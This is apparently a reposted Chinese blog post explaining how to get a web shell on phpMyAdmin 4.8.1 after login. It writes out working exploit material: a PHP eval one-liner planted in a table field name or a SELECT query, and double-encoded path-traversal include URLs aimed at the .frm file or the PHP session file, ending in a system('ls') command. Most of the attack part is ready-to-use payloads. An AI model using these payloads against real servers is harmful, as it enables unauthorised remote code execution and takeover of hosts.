phpmyadmin4.8.1后台getshell

weixin_30716725

于 2018-12-14 01:27:00 发布

阅读量504

点赞数

CC 4.0 BY-SA版权

文章标签： php 数据库

原文链接：http://www.cnblogs.com/zaqzzz/p/10117371.html

本文介绍了通过PHPMyAdmin 4.8.1版本获取WebShell的两种方法：一是利用数据库文件包含特性，二是利用查询语句将木马写入session文件。详细步骤包括创建特殊字段名的表和执行特定查询语句。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

phpmyadmin4.8.1后台getshell

包含文件进行getshell

姿势:

建立数据库的，新建表，字段名为一句话木马。

会生成对应的数据库文件，相应文件的路径查看

select @@datadir;

这个样子就会在/var/lib/mysql/hack/hack.frm的文件里包含着一句话木马的字段。

?target=db_sql.php%253f/../../../../../../var/lib/mysql/data/hack/hack.frm

权限不够，

不过这个再linux下面倒是很简单，不用考虑权限。

查询语句(一句话木马)，

执行查询

select '<?php @eval($_GET["code"])?>'

之后会保存在session文件里。

session文件:

/var/lib/php/sessions/sess_你的SESSION ID

包含payload:

?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_6ker17rs59cuu39e6rfdpdrcaoto5116&a=system("ls");

转载于:https://www.cnblogs.com/zaqzzz/p/10117371.html